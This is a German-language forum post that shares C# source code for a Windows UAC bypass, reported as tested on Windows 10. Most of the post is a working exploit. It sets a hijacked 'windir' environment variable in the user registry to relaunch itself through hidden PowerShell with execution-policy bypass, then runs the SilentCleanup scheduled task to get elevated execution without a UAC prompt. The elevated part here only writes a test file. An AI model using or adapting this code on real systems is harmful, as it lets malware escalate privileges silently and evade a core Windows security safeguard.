No replies to this topic

[IRET]

Sollte mit den meisten Windows Systemen funktionieren. Getestet unter aktuellstem Windows 10.

Powershell sollte nicht ganz deaktiviert sein (Bypasses sind natürlich mit drinnen).

Useraccount muss Adminrechte haben. Es umgeht nur den UAC-Dialog.

using System;
using System.Security.Principal;
using Microsoft.Win32;
using System.Diagnostics;
using System.Threading;

 
namespace UAC_Bypass
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            bool isElevated = false;
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
 
            if (isElevated)
            {
                System.IO.File.WriteAllText("C:\\windows\\test.txt", "xyz");
            }
            else
            {
                // UAC bypass
                using (RegistryKey key = Registry.CurrentUser.OpenSubKey("Environment", true))
                {
                    key.SetValue("windir", "powershell -ep bypass -w h -Command \"& " + System.Reflection.Assembly.GetEntryAssembly().Location + "\";#", RegistryValueKind.ExpandString);
                    Process.Start("schtasks", "/run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I");
                    Thread.Sleep(5000);
                }

                using (RegistryKey key = Registry.CurrentUser.OpenSubKey("Environment", true))
                {
                    key.DeleteValue("windir");
                }
            }
        }
    }
}

Edited by IRET, 24 January 2020 - 10:37 Uhr.